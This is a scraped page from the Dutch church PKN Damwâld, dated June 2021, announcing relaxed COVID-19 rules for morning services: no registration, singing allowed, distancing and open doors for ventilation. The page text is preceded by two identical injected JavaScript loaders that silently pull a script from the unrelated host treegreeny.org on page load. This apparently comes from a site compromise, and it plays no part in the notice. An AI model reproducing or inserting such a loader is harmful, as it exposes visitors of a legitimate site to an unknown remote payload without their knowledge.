;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Versoepelingen coronamaatregelen - PKN Damwâld

Versoepelingen coronamaatregelen

Gepubliceerd op: vrijdag 25 juni 2021

De corona maatregelen zijn met ingang van zondag 27 juni opnieuw versoepeld en daarom zijn de beide moderamen dankbaar dat we de ochtenddiensten weer beschikbaar kunnen stellen voor maximaal 100 gemeenteleden. U bent dan ook van harte uitgenodigd om de ochtenddienst weer bij te wonen. Opgave is NIET meer nodig. Wij vragen u wel om bij binnenkomst uw naam en telefoonnummer te noteren en uw handen te ontsmetten. Mondkapjes zijn niet meer nodig en er mag weer gezongen worden. Het blijft wel belangrijk om de 1,5 meter afstand te bewaren. De toiletten mogen ook weer gebruikt worden. Heeft u klachten of bent u in contact geweest met iemand die corona klachten heeft, blijf dan thuis. Daarnaast kunt u de dienst natuurlijk ook via de live stream volgen.

Vanwege het toegenomen risico van Covid19 besmettingen is ventilatie in de kerkzaal belangrijk. Daarom zullen zowel de buiten als binnendeuren van de kerkzaal tijdens de dienst open staan. Wilt u de hinder van tocht voorkomen, kies dan een plaats waar u van de tocht geen last hebt.